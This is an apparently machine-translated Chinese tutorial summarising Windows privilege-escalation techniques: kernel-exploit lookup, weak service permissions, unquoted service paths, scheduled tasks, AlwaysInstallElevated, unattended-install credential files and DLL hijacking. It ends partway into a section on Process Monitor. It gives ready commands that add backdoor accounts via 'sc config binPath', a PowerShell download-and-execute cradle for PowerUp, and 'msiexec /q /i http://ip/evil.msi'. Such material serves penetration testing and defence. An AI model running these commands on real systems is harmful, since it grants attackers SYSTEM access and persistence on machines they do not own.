Windows 提权方式总结

1 前言

1.1 提权基础命令

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

# Query system information

systeminfo

# If you want to view specific information, you can use

systeminfo | findstr /B /C:'OS name' /C:'OS version'

# Host Name

Hostname

# Environment variables

Set

# View user information

Net user

# View service pid number

tasklist /svc|find 'TermService'

netstat -ano|find '3389'

# Check the system name

wmic os get caption

# View patch information

wmic qfe get Description,HotFixID,InstalledOn

# If you want to locate a specific patch, you can use the following command

wmic qfe get Description,HotFixID,InstalledOn | findstr /C:'KB4346084' /C:'KB4509094'

# View the current installer

wmic product get name,version

It is necessary to pay attention to environment variables, because some software environment variables may be set in other paths, and files under this path have write permissions, so you can use替换文件to achieve the privilege escalation operation.

1.2 Windows 权限划分

User: Normal user permissions, the most secure permission in the system. The default permission assigned to this group does not allow members to modify the operating system settings or user profiles.

Administrator: Administrator permissions, you can use Windows mechanisms to promote itself to System permissions to operate SAM files, etc.

System: System permissions, which can read sensitive files such as SAM. It often requires the Administrator permission to be elevated to System permission to perform Dump operation on the hash value.

TrustedInstaller: The highest permission. For system files, even System permissions cannot be modified. Only TrustedInstaller permissions can modify files.

1.3 常见 webshell 所处的权限

The usual webshell permissions are as follows:

ASP, PHP - Anonymous permissions

ASPX - user permissions

JSP - usually system permissions

2 系统内核提权

This method of escalation is an method of escalation that has been exposed through some vulnerabilities in the system itself and has not been patched accordingly. Relying on the EXP that can escalate permissions and their patch numbers, the permissions are escalated.

examine:

1

2

3

4

5

systeminfo

wmic qfe get Caption, Description, HotFixID, InstalledOn

# msf

post/windows/gather/enum_patches

Windows-Exploit-Suggester

The following is the page for assisting with the promotion of rights:

https://github.com/SecWiki/windows-kernel-exploits

https://wiki.0-sec.org/#/index

https://github.com/neargle/win-powerup-exp-index

http://blog.neargle.com/win-powerup-exp-index/

https://detect.secwx.com

3 配置不当提权

3.1 系统服务权限配置错误

The Windows system service file is loaded and executed when the operating system starts, and the executable file is called. Therefore, if a low-privileged user has writable permissions to the executable file called, the file can be replaced with any executable file and gained system permissions as the system service starts. However, in general, Windows executes with System permissions. Therefore, its folders, files and registry key values are protected by strong access control mechanisms, but in some cases some services are still not effectively protected.

3.1.1 accesschk

Download address: https://download.sysinternals.com/files/SysinternalsSuite.zip

Use the accesschk.exe tool to view services that can be modified by the current user:

accesschk.exe -uwcqv 'XXX' * /accepteula 1.txt //XXX is the current username

If SERVICE_ALL_ACCESS appears, it means that the current user has permission to modify the service

View permissions when the service starts

sc qc VMTools

Then modify the execution file path to the command we want to execute

1

2

3

4

5

# Note that there should be spaces after '=' here

sc config VMTools binPath='net user test1 abc123! /add'

# Check whether the execution path of the query service is successfully modified

sc qc VMTools

Restart the service

1

2

sc stop VMTools

sc start VMTools

But be aware that an error will be reported when starting here, because when a service is started on a Windows system, it must communicate with the Service Control Manager. If there is no communication, the Service Control Manager will consider an error and terminate the process. But our command has been run with SYSTEM permission and a user has been successfully added.

information

It is also possible to use the system's own icacls:

Confirm write permissions: icacls 'C:\Program Files\program folder'

"M" means modification, "F" means complete control

"CI" means that the slave container will inherit the access control item

"OI" means that the slave file will inherit the access control item

Commonly used commands:

1

2

3

4

5

6

icacls 'C:\Program Files\*' 2nul | findstr '(M)' | findstr 'Everyone'

icacls 'C:\Program Files(x86)\*' 2nul | findstr '(M)' | findstr 'Everyone'

icacls 'C:\Program Files\*' 2nul | findstr '(M)' | findstr 'BUILTIN\Users'

icacls 'C:\Program Files(x86)\*' 2nul | findstr '(M)' | findstr 'BUILTIN\Users'

3.1.2 PowerSploit

1

2

3

powershell.exe -exec bypass -nop -c 'IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks'

powershell.exe -exec bypass -Command ' {Import-Module D:/PowerUp.ps1; Invoke-AllChecks}' 1.txt

List all possible services that may have problems:

ServiceName: A service that may have a vulnerability

Path: The path to the executable program of the service

StartName: Service running account

AbuseFunction: How to use it

Execute scripts according to the utilization method in AbuseFunction, here we take the VGAuthService service as an example

Add an account named user with password 123456:

1

powershell.exe -exec bypass -Command ' {Import-Module C:/PowerUp.ps1;Invoke-ServiceAbuse -Name 'VGAuthService' -Username user -Password 123456}'

3.1.3 metasploit

1

2

3

4

use exploit/windows/local/service_permissions

set AGGRESSIVE true

set session 1

exploit

3.2 可信任服务路径提权

The Trusted Service Path vulnerability exploits the Windows file path resolution feature. If the executable file called by a service does not correctly handle the referenced full path name, and the attacker has writable permissions for the file path, the attacker can upload the file to hijack the path name.

For example, the file path found when a Windows system starts a service is C:\Program Files\Some Folder\Services.exe.

For each space in the path, Windows tries and executes programs that match the name before the space, so Windows looks for the startup program in the following order:

C:\Program.exe

C:\Program Files\Some.exe

C:\Program Files\Some Folder\Services.exe

At this time, if we have writable permissions to the C:\path or C:\Program Files, we can upload the Program.exe or Some.exe program to the corresponding directory. When the service restarts, the malicious program we upload will be executed with System permissions.

Conditions of use:

The service path is not using double quotes

The service path contains spaces

We have write permissions for a certain intermediate folder

3.2.1 检查

1

wmic service get name,displayname,pathname,startmode|findstr /i 'Auto' |findstr /i /v 'C:\Windows\' |findstr/i /v '''

3.2.2 利用

Next check whether you have write permissions to the target folder, use the built-in Windows tool icacls to check the paths at each level:

1

2

3

icacls 'C:'

icacls 'C:\Program Files'

icacls 'C:\Program Files\VMware'

Check whether the directories at each level have writable permissions, and finally find the C:\Program Files\VMware directory. In this directory, it is a Trojan. After it is launched, it is a high permission.

3.3.3 msf 中的模块

exploit/windows/local/trusted_service_path module

3.3 计划任务提权

If an attacker has written permissions to the directory where the planned task runs with high permissions, he can use a malicious program to overwrite the original program, so that the malicious program will be run with high permissions the next time the planned task is executed.

1

Get-ScheduledTask | Select * | ? {($_.TaskPath -notlike '\Microsoft\Windows\*') -And ($_.Principal.UserId -notlike '*$env:UserName*')} | Format-Table -Property State, Actions, Date, TaskPath, TaskName, @{Name='User';Expression={$_.Principal.userID}}

Check the permission configuration of a directory

1

accesschk64.exe -dqv '/path/to/dir'

If an attacker has writable permissions to the path where a planned task with a high authority is located, he can use a malicious program to overwrite the original program. When the planned task is executed next time, the malicious program will be run with high authority.

4 AlwaysInstallElevated 提权

Registry key AlwaysInstallElevated is a policy setting item. Window allows low-privileged users to run MSI installation files with System permissions. If this policy setting item is enabled, any user with permission can run malicious MSI files with NT AUTHORITY\SYSTEM permissions.

4.1 查询

Query:

1

2

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

The AlwaysInstallElevated policy is not enabled, and the result is: "The specified registry key or value cannot be found"

4.2 开启

1

2

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

4.3 执行 MSI 文件

Local execution: msiexec /q /i C:\msi.msi

/i parameter is used to indicate installation operation

/q parameter is used to hide the installation interface

In addition, MSIEXEC can also implement the Trojan online method without landing files. Of course, low permissions cannot be used, because msi files require trusted certificates to be used remotely. AlwaysInstallElevated privileges: msiexec /q /i http://ip/evil.msi

4.4 利用

4.4.1 PowerUP 脚本

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Test whether to enable AlwaysInstallElevated:

1

2

Import-Module .\PowerUp.ps1

Get-RegistryAlwaysInstallElevated

Return True means on.

4.4.2 MSI Wrapper 添加用户

MSI Wrapper Download address: https://www.exemsi.com/download/

Set Payload to execute ProcessHacker:

Runtime requires elevated permissions:

Under MSI installation context, select Per User and Per Machine.

5 无人值守安装文件

Some Windows unattended installation files contain user's plaintext or base64 encoded ciphertext

1

dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2nul

Common locations:

C:\sysprep.inf

C:\sysprep\sysprep.xml

C:\Windows\system32\sysprep.inf

C:\Windows\system32\sysprep\sysprep.xml

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattend\Unattend.xml

C:\Windos\System32\sysprep\unattend.xml

C:\Windows\System32\Sysprep\Panther\unattend.xml

6 DLL 劫持提权

6.1 相关概念

6.1.1 DLL 简介

What is hijacking

Perform a bypass operation before a normal thing happens

Dynamic link library (Dynamic-Link-Library, abbreviation dll). In Windows, many applications are not a complete executable file, they are divided into relatively independent dynamic link libraries, namely DLL files, and placed on the system. When a program is executed, the corresponding DLL file will be called. An application can use multiple DLL files, and a DLL file can also be used by different applications. Such a DLL file is called a shared DLL file.

6.1.2 DLL 的加载顺序

Microsoft's DLL hijacking is divided into three stages

Unprotected phase: Before Windows XP SP2

Protection phase: After Windows XP SP2, before Windows 7

Further protection phase: After Windows 7

Before Windows XP SP2

The directory where the application corresponding to the process is located;

The current directory (SetCurrentDirectory) that is located when the DLL is loaded;

The system directory is the SYSTEM32 directory (getSystemDirectory);

The 16-bit system directory is the SYSTEM directory;

Windows directory: C:\Windows (geted through GetWindowsDirectory);

Each directory in the PATH environment variable;

After Windows XP SP2

In order to prevent the occurrence of DLL hijacking vulnerabilities, Microsoft added a SafeDllSearchMode registry attribute after XP SP2. The registry path is as follows:

1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

When the value of SafeDllSearchMode is set to 1, that is, when the search mode of the safe DLL is turned on, the directory order for searching DLLs is as follows:

The directory where the application is located;

System Directory SYSTEM32 Directory;

The 16-bit system directory is the SYSTEM directory. This item is only for forward compatibility and can be ignored

Windows Directory. Usually it is C:\Windows;

The current directory where the DLL was loaded;

All directories in the environment variable PATH. It should be noted that the application path specified by the App Paths registry key is not included here.

After win7

In order to further prevent the system's DLLs from being hijacked, Microsoft wrote some easily hijacked system DLLs into a registry key,那么凡是此项下的 DLL 文件就会被禁止从 EXE 自身所在的目录下调用, and can only be called from the system directory, namely the SYSTEM32 directory. The registry path is as follows:

1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs

The Windows operating system determines the path of the DLL to call the application through the mechanisms of "DLL path search directory order" and "Know DLLs registry key". After that, the application loads the DLL into its own memory space and performs the corresponding function functions.

Registry path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs

6.1.3 分析 DLL 的加载过程 - Process Monitor

Process Monitor is an advanced monitoring tool for Windows that displays real-time file system, registry, and process/thread activity.

https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-utilities

Process Monitor Filter is used to filter application input